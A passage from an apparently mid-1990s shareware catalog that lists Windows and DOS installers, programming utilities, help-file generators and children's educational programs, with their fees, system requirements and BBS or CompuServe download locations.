+ Description: + An installation program for Windows. It was designed for + programmers, consultants, and other users who need a program to + easily install Windows applications. On-line help. + + + Product: First Impression + Author: Lincoln Beach Software, 314-861-1500 + Version: 3.1 (06-09-95) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; bonus utilities; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: IMPRES31.ZIP on BBSs (call 317-784-2147 to download it + at no charge); IMPRES.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 0 (or contact userID 70700,630 for assistance). + PsL#: 10931 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Scriptless installation toolkit for developers that covers + every aspect of an install. Full featured WYSIWYG developer + interface allows you to create that exact look you need without + writing a script! Check for h/w requirements as well as + updates CONFIG and AUTOEXEC files. Auto search will search a + drive for prev. installations and conditional checking allows + necessary actions to be performed if needed. Many hardware + verification options! + + Chapter 12, "Computer programming" 486 + + + + Product: Inspect & Install for Windows + Author: M2w Software + Version: 1.10 (02-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 3 months of fax, + CompuServe, mail support; royalty-free source code; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: availability unknown on BBSs; IINST*.ZIP on CompuServe + in CIS:UKSHARE forum LIBrary 0 (or contact userID 100120,2335 + for assistance). + SWREG#: 2126 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Inspect & install includes utilities to inspect version + information and to install single program files on Windows/ + Windows NT, or to install complete groups of files based on a + simple script. This setup utility allows you to create Program + Manager groups together with installation directories. + + + Product: PUT, GET, Install Utilities + Compression, archive, installation aids. See full description + on page 50. + + Product: QUIK-INSTALL + Author: Michael L. Wester, 919-552-0767 + Version: 2.0 (12-07-93) + Needs: IBM PC, DOS 2.1 or better. 184k RAM. + Registration fee: $15.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; royalty-free runtime license; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: availability unknown on BBSs; QINST2.ZIP on CompuServe + in CIS:IBMPRO forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Create a fully functional, self contained, application install + program in less than 5 minutes! Menu driven setup (No scripts, + CFG's or programing) with mouse support & context sensitive + help. Supports multiple disks, creates directories, copies + files or unpacks EXE archives, checks disk space, executes + application after installation, 6.5k INSTALL.EXE stores setup + information internally, configure colors, prompt, messages, + adds functionality to batch files, very quick & very easy! + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 43. + + Chapter 12, "Computer programming" 487 + + + + Product: SETUP.EXE [***] + Author: Chapter One Developments Ltd., (44)-0-973-222937 + Version: 4.6 (08-12-95) + Needs: IBM AT (80286), Windows 3.0 or better. Windows + development system such as Visual Basic or Delphi. + Registration fee: $10.00 + Registration benefits: lifetime unlimited fax, CompuServe, mail + support; lifetime return policy; royalty-free source code; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; ASETUP.ZIP on CompuServe + in CIS:MSBASIC forum LIBrary 9 (or contact userID 100030,351 + for assistance). + SWREG#: 5171 + PsL#: 14067 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Free 18k bootstrapper program. Features include full dialog box + customisation and enhanced error messages (optional 3d look), + Windows file version checking, setup log, optional temporary + directory use, ability to localise all text, and more - over 22 + configuration settings! Originally for Visual Basic (as an + advanced alternative to the SETUP.EXE supplied with that + product) but can be used with any Windows development system. + Includes Windows help. + + + Product: Universal Install + Author: The GoodSoft Co., 303-444-5747 + Version: 2.0 (05-10-94) + Needs: IBM PC, DOS 3.0 or better. 250k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $39.95 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; royalty-free runtime license; bonus utilities; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: UNST20.ZIP on BBSs (call 303-XXX-XXXX to download it at + no charge); UNST20.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 3 (or contact userID 72073,225 for assistance). + SWREG#: 907 + PsL#: 11020 + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + A professional software installation development kit featuring + built-in file compression (save up to 50% space), a text file + view feature with print and search functions, self-contained + INSTALL.EXE generation, features to make modifications to any + file (even WIN.INI) and create batch files to run your + + Chapter 12, "Computer programming" 488 + + + + software. The end result can look and feel like your own + software - you have complete control over all aspects of your + installation. + + + Product: Vending Machine + Author: Lincoln Beach Software, 314-861-1500 + Version: 1.5 (06-17-95) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $50.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: VEND15.ZIP on BBSs (call 317-784-2147 to download it at + no charge); VEND15.ZIP on CompuServe in CIS:0 forum LIBrary 0 + (or contact userID 70700,630 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Custome installation toolkit for disk vendors that will allow + users to uncompress up to 10 files per disk into a user defined + subdirecotry. Allows for configuration encryption and file + viewing for each ZIP. + + + Product: WINstall + Author: Dovcom, 801-221-4527 + Version: 1.0a (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse; XMS + memory. + Registration fee: $39.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; choice of 31/2" or 51/4" master disk(s); 12 months + of unlimited phone, CompuServe, mail support; 3-month return + policy; royalty-free runtime license; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 3-month free upgrading allowed. + Look for: WINS10A.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WINS.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 22 (or contact userID 74552,1027 for assistance). + SWREG#: 3512 + PsL#: 11587 + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + A professional Windows installation utility that provides + software publishers with an easy to use, compact tool with + which they may set up their software on users' computers. Fully + automated and supports installation from multiple floppies of + any size or directly from a hard drive or CD-ROM. At only 25k + this is the smallest program of its type for the power and + + Chapter 12, "Computer programming" 489 + + + + flexability that it offers. Don't sacrifice disk space for a + quality install. + + + 12.8 Software testing aids + + Product: c-scope + Easy to use C program static analysis tool. See full + description on page 492. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 153. + + Product: DMalloc + Malloc debugger library. See full description on page 471. + + Product: RI-VB Database Toolkit v1.1 + Author: MIS Resources International, 404-594-7500 + Version: 1.1 (02-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + XMS memory; VBRUN300.DLL. + Registration fee: $30.00 (add $3.95 for shipping to U.S. + addresses) (add $7.95 for shipping to Canadian addresses) (add + $7.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 3-month limited + return policy; site license; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: RIDT11.ZIP on BBSs; RIDT11.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 4783 + Download size: 684k (about 51 minutes with a 2400 baud modem) + Description: + For use in the development of Visual Basic and MS Access + database applications. A means for executing single/multiple + SQL statements on Access database; adding, modifying, running, + exporting and importing query defs listings; generating SQL + create and insert statements from an existing Access database. + Output directed to screen, text file, printer or the clipboard. + Fully functional with online help. This revised version + replaces RIDT10.ZIP and allows spaces in Database or field + names. + + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 43. + + Product: Teleshare/DOS Remote Access [***] + Basic DOS remote control. See full description on page 443. + + Chapter 12, "Computer programming" 490 + + + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 204. + + + 12.9 Programming utilities + + Product: BASASM.LIB + Assembler routine library for BASIC programs. See full + description on page 456. + + Product: Basic Program Cross Reference + Basic program cross-reference utility. See full description on + page 456. + + Product: c-scope + Author: JAYAR Systems, 416-751-5678 + Version: 1.11 (10-31-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $24.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, mail support; royalty-free runtime license; all ASP-wide + offers (see page 6). + Look for: CSCOP111.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 46k (about four minutes with a 2400 baud modem) + Description: + Completely analyzes the interrelationships between functions in + a C program no matter how complex it is--even when many source + files are involved. It produces a Function Location report + showing the file each function is defined in; a File Contents + report naming the functions defined in each file; a Function + Reference report listing the functions each function calls; and + a Static Calling Tree report giving a visual representation of + the function calls. + + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 147. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 230. + + Product: The DemoMaker + Creates demos/slide shows for any DOS program. See full + description on page 483. + + Chapter 12, "Computer programming" 491 + + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 37. + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 114. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 51. + + Product: Simply Docs + Converts ASCII files to EXEs. TSR/print opts. See full + description on page 65. + + Product: Simply Help! + Create hypertext documents - EXE/TSR/QB/PDS. See full + description on page 482. + + Product: ToolDriver + Author: ConVal Software, Inc., 805-529-6847 + Version: 2.01 (04-15-93) + Needs: IBM AT (80286), DOS 3.1 or better. + Registration fee: $59.95 + Registration benefits: Printed manual, phone support, 30 day + money-back guarantee, upgrade discounts. Registered version + uses RAM above 640k. + Look for: TLDR20.ZIP on BBSs (call 607-533-7072 to download it at + no charge); TLDR20.ZIP on CompuServe in CIS:IBMPRO forum + LIBrary 6 (or contact userID 72330,1621 for assistance); + TLDR20.ZIP on GEnie in IBMPC forum LIBrary 0 (or contact userID + J.GRAY22 for assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + Provides a window environment for organizing a software project + (but Microsoft Windows is not required). Comes with menus, + mouse support and online help. With ToolDriver you can see what + will be impacted before you make a change. It also identifies + obsolete files. Here, too, you can polish and refine naming + conventions throughout your application, gaining better + maintainability. And names can be altered to facilitate porting + a successful application to and from DOS. + + + Product: Universal Install + Software installation development kit. See full description on + page 487. + + Product: Workbase [***] + Dot-prompt utility for DBMS programmers. See full description + on page 294. + + Chapter 12, "Computer programming" 492 + + + + 12.9.1 Desktop tools for programmers + + See also: Business, Training & support aids, "Help desk" + applications. + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 130. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 221. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 222. + + Product: Builder + Clipper application generator. See full description on + page 300. + + Product: Examine + Fast text search utility for Windows. See full description on + page 18. + + Product: Helpgen + Windows help file generator - authoring tool. See full + description on page 496. + + Product: NewBase + Author: GWN Software, 403-778-5028 + Version: 1.0 (03-15-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $25.00 + Registration benefits: 4 months of phone, CompuServe, GEnie, mail + support; 4-month limited return policy; all ASP-wide offers + (see page 6); discounts on other products. 4-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: NEWBASE.ZIP on BBSs; NBASE.ZIP on CompuServe in + CIS:PCPROG forum LIBrary 6 (or contact userID 70473,57 for + assistance); NEWBASE.ZIP on GEnie in IBMPC forum LIBrary 15 (or + contact userID G.MANWEILER for assistance). + Download size: 227k (about 17 minutes with a 2400 baud modem) + Description: + Calculates integer bases in hexadecimal, decimal, octal, and + binary. Displays the full ascii character set. Returns the scan + code of function key and function key combinations. Codes + attribute bytes and displays the value in hex, decimal, and + octal. Has a 6 month calendar, DOS command line and DOS shell, + color scheme and mouse speed selection. Has a hpertext based + help and tutorial system. + + Chapter 12, "Computer programming" 493 + + + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 292. + + Product: RUF100.ZIP + Reuseable functions for Visual Basic. See full description on + page 467. + + Product: SLIB10.ZIP + Author: MIS Resources International, 404-594-7500 + Version: 1.0 (03-31-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; VGA + monitor; Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; XMS memory. + Registration fee: $10.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 3-month return + policy; royalty-free runtime license; site license; all ASP- + wide offers (see page 6). 3-month free upgrading allowed. + Look for: SLIB10.ZIP on BBSs; SLIB10.ZIP on CompuServe in + CIS:MSBASIC forum LIBrary 17 (or contact userID 75350,205 for + assistance). + SWREG#: 5263 + Download size: 620k (about 46 minutes with a 2400 baud modem) + Description: + A Windows utility to store excerpts of source code in a + database for easy retrieval. Code may be copied to the + clipboard, printed or edited. A search function is also + provided. Fully functional. + + + Product: Windev - Windows Developer + Author: Helios Software Solutions, (0772)-324353 + Version: 1.56 (09-19-93) + Needs: IBM 80386, Windows 3.1 or better. Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $32.00 (add $5.90 for shipping to U.S. + addresses) (add $5.90 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of fax, + CompuServe support. + Look for: availability unknown on BBSs; WINDEV.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 100041,235 + for assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + An integrated program development environment for MS Windows, + that can be used just as well for text editing only. Has a + powerful multi-windowed editor with configurable key bindings + to emulate other editors, and a search/replace command using + UNIX-style regular expressions. Integrates file comparison & + + Chapter 12, "Computer programming" 494 + + + + multi-file searching tools, with user-defined tools, and + interfaces to any vendor's compiler. + + + Product: Windev - Windows NT Developer + Author: Helios Software Solutions, (0772)-324353 + Version: 1.56 (09-19-93) + Needs: IBM 80386, Windows NT 3.1 or better. Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $32.00 (add $5.90 for shipping to U.S. + addresses) (add $5.90 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of fax, + CompuServe support. + Look for: availability unknown on BBSs; WINDEV.ZIP on CompuServe + in CIS:MSWIN32 forum LIBrary 16 (or contact userID 100041,235 + for assistance). + Download size: 355k (about 27 minutes with a 2400 baud modem) + Description: + An integrated program development environment for MS Windows, + that can be used just as well for text editing only. Has a + powerful multi-windowed editor with configurable key bindings + to emulate other editors, and a search/replace command using + UNIX-style regular expressions. Integrates file comparison & + multi-file searching tools, with user-defined tools, and + interfaces to any vendor's compiler. + + + 12.9.2 `Help' utilities + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 481. + + Product: Helpgen + Author: Rimrock Software, 208-772-9347 + Version: 1.20 (09-06-94) + Needs: IBM 80386, Windows 3.1 or better. 150k RAM. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; HPGN12.ZIP on CompuServe + in CIS:IBMPRO forum LIBrary 6 (or contact userID 71211,70 for + assistance). + SWREG#: 3462 + Download size: 198k (about 15 minutes with a 2400 baud modem) + Description: + Create attractive Windows help files for your programs without + using an expensive word processor. Uses an easy-to-learn macro + language to take the pain out of creating your help files. + Includes full RTF language support through the macro language + + Chapter 12, "Computer programming" 495 + + + + and/or RTF commands. Makes it easy to create and test help + files. A help file tutorial is also included. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 231. + + + 12.10 Software tools & add-ins + + See also: Database applications, Software tools & add-ins. + + 12.10.1 For multiple programs + + Product: Content Label Rating [***] + Software Rating System. See full description on page 717. + + Product: SLIB10.ZIP + Source code librarian utility. See full description on + page 493. + + 12.10.2 For other + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 106. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 106. + + Product: Ahelp Clipper Help Library + Author: MicroFox Company, 216-659-9489 + Version: 1.43 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 16k RAM. Clipper. + Strongly recommended: Hard disk; Mouse. + Registration fee: $95.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; royalty-free source code; LAN + license; site license; bonus utilities; all ASP-wide offers + + Chapter 12, "Computer programming" 496 + + + + (see page 6); disks of other shareware; discounts on other + products. 1-month free upgrading allowed. + Look for: AHP143.ZIP on BBSs (call 216-661-9065 to download it at + no charge); AHP143.ZIP on CompuServe in CIS:CLIPPER forum + LIBrary 0 (or contact userID 73057,3113 for assistance); + AHP143.ZIP on GEnie in CLIPPER forum LIBrary 0. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Create fully index and context sensitive help screens. The + programmer can optionally let users add/update help text. Help + windows pop up when user presses help key for a specific topic + or users can search help topic index for information. + + + Product: Btr Help! + Author: Informative Technologies, 202-675-4528 + Version: 1.88 (06-15-91) + Needs: IBM PC, DOS 3.0 or better. BTRIEVE.EXE or BREQUEST.EXE. + Registration fee: $40.00 + Registration benefits: Printed Manual with disk; One year of + Phone/FAX/Mail/Email/BBS support; Bonus Disk of Btrieve + Utilities; Btrieve "C" Library with full source; Certificate + for Free CompuServe Membership; Certificate for $7 off a + subscription to Shareware Magazine. + Look for: BTRHLP??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); BHLP??.ZIP on CompuServe in CIS:NOVA forum + LIBrary 14 (or contact userID 74777,3004 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Provides the functions needed for the design, development and + maintenance of applications using Btrieve. It's great for file + maintenance with: Great Plains Accounting, IBM's Platinum + Series, Pacioli 2000 Accounting, Galacticomm BBS, Macola + Accounting, Xtrieve, Magic PC DBMS, DacEasy Accounting or any + application that uses Btrieve. It provides an easy way to + repair damaged Btrieve database files or test their integrity. + Browse and edit records in many different formats - and much + more! + + + Product: Btr Watch + Memory resident Btrieve debugger. See full description on + page 301. + + Chapter 12, "Computer programming" 497 + + + + Product: MouseTools + Author: Arcanum Computing + Version: 1.0 (09-13-89) + Needs: IBM PC, DOS 2.1 or better. Turbo Pascal. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; royalty-free source + code; + Look for: MOUSTL55.ZIP on BBSs (call 508-788-6951 to download it + at no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Provides a set of mouse interface routines for Turbo Pascal + programmers. Included are low level routines for positioning + and moving mouse cursors as well as higher level routines for + selecting files, multiple choice questions, etc. + + + Product: Playground + Tool for building object models. See full description on + page 451. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 51. + + Product: TURBO TPU TOOLKIT! + Author: LONE WOLF ENTERPRISES + Version: 1.5 (03-01-94) + Needs: IBM AT (80286), DOS 3.3 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; math coprocessor. Turbo Pascal v5.5 or later. + Registration fee: $100.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of phone, CompuServe, mail support; 6-month limited + return policy; all ASP-wide offers (see page 6); discounts on + upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; TTT1.ZIP on CompuServe in + CIS:LIBRARY forum LIBrary 0 (multiple files) (or contact userID + 73353,121 for assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A math library for Turbo Pascal programmers. Engineers and + scientists will get features like hyperbolics, inverse trig, + factorials, primes, matrix math, eigenvalues/vectors, nxn + determinants, matrix multiplication, matrix inversion and + multiple regression. Engineering unit conversions for force, + power, volume, heat, work, viscosity, mass/molar flux, heat- + transfer coefficients and much, much more! Comes with a manual + explaining all the functions. + + Chapter 13, "Education" 498 + + + + + + Chapter 13 + Education + + See also: Writing applications, Bibliography. + + + 13.1 Preschool + + Product: Animated Alphabet + Author: FLIX Productions + Version: 1.0 (04-12-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus utilities; bonus graphics; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: ALPHA10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ALPHA1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 452k (about 34 minutes with a 2400 baud modem) + Description: + When the child matches the correct letter of the alphabet to + the picture, the picture becomes animated in an amusing way. + Winner of Shareware Industry Award for "Best Educational + Software". + + + Product: Animated Bugs + Author: FLIX Productions + Version: 1.0 (09-07-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $12.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: ABUGS10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); ABUG1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 1184k (about 88 minutes with a 2400 baud modem) + Description: + A board game for young children that is full of color (256 of + them), sound (effects and voice) and animation. Garden + backgrounds, mini-animtions, and full-screen animtions are + featured. Two players can play the game (one or both can be the + + Chapter 13, "Education" 499 + + + + PC). Movement is determined by a spinner that can be either + numbers, colors or shapes. From FLIX Productions, winner of + both the Shareware Industry Award and Ziff Davis Shareware + Award. + + + Product: Animated Shapes + Author: FLIX Productions + Version: 1.0 (09-25-90) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $8.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: SHAPES10.ZIP on BBSs (call 512-258-0571 to download it + at no charge); SHAPE1.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 72740,1326 for assistance). + Download size: 267k (about 20 minutes with a 2400 baud modem) + Description: + Children learn shapes and colors with animation. When the + shapes and colors of a geometrical object are correctly + identified, the object is used to build a picture. Guessing + what the picture will be is part of the fun. Once the picture + is completed, it turns into a movie-like animation. Winner of + the Shareware Industry Award for "Best Educational Software". + + + Product: Brandon's Big Lunchbox + Author: Robichaux and Associates, 713-463-7452 + Version: 1.75 (09-17-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + CompuServe, mail support; bonus graphics. + Look for: BIGBOX.ZIP on BBSs; BIGBOX.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 11 (or contact userID 71336,336 for + assistance); BIGBOX.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID JEROBICHAUX for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + 26 colorful educational games that will keep young computer + users busy for hours! Open the Lunchbox and your computer + users will have loads of fun learning computer skills, problem + solving, drilling on sight words, solving fun math problems, + playing memory games, learning the alphabet, plus much more. + Pick every game from the main Lunchbox menu. Keep the word + games fresh - customize your word list! + + Chapter 13, "Education" 500 + + + + Product: Brandon's Preschool Graphics Lu + Author: Robichaux and Associates, 713-463-7452 + Version: 1.0 (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: sound card. + Registration fee: $10.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited CompuServe, + mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; PREBOX.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 0 (or contact userID 71336,336 for + assistance). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + It speaks! Bright VGA graphics and Soundblaster/PC speaker + support, the Preschool Lunchbox uses human voice to drill + preschoolers in three different number games. Colorful + rewards, including guitar riffs (recorded on a series of + vintage electric guitars and pumped through vintage Marshall + and Fender amps) ranging from jazzy splits to wailing shreds. + This is volume 1 of a 4 volume set + + + Product: Card Flash + Card flash. See full description on page 517. + + Product: Color Fun + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (05-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, + GEnie, mail support; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: COLFUN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); COLFU*.ZIP on CompuServe in ZNT:PBSHOM forum + LIBrary 1 (or contact userID 71532,3271 for assistance); + COLFUN10.ZIP on GEnie in WINDOWS forum LIBrary 20 (or contact + userID XRG36978 for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + A Windows educational game for children of ages 2-8. Teaches + children the basic colors and how to use computers. On-line + help. + + Chapter 13, "Education" 501 + + + + Product: EGA Mouse Paint + Electronic coloring book. See full description on page 508. + + Product: Mouse Math [***] + A whimsical verbal math drill program. See full description on + page 532. + + Product: SUNDAY SCHOOL COLORS + A coloring game for children. See full description on + page 512. + + Product: Talking ABC's + Uses the PC speaker to talk to your child! See full + description on page 712. + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 513. + + Product: Z & Z Color [***] + Author: Z & Z Software, 410-561-3891 + Version: 3.1 (09-01-95) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; Hard disk; + Mouse. + Strongly recommended: sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited phone, CompuServe, mail support; bonus + data; bonus graphics; all ASP-wide offers (see page 6); + discounts on upgrades. 6-month free upgrading allowed. Bonus + audio files. + Look for: ZZCOLR.ZIP on BBSs; ZZCOLR.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 12 (or contact userID 76021,2256 for + assistance). + SWREG#: 1406 + PsL#: 11741 + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + Color-by-number Windows program great for age 3 and above. + Teaches colors, numbers, letters, shapes, and memory skills + while entertaining again and again. Color one of the included + pictures or create your own. Prize is awarded upon successful + completion of each drawing. Windows compatible sound board is + recommended but not required. Testimonials: "just great", + "love your program", "wonderful", "3 year old ... is doing Z & + Z Color almost every day". + + + Product: Z & Z Puzzle [***] + Windows combination jigsaw/slider puzzle. See full description + on page 515. + + Chapter 13, "Education" 502 + + + + 13.2 Elementary + + Product: ACCU Music System + Create music that can be played, printed, etc. See full + description on page 628. + + Product: Anim. Multiplication & Division + Author: FLIX Productions + Version: 3.0 (05-12-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; EGA monitor; Hard + disk. + Registration fee: $10.00 (add $1.00 for shipping outside U.S. or + Canada) + 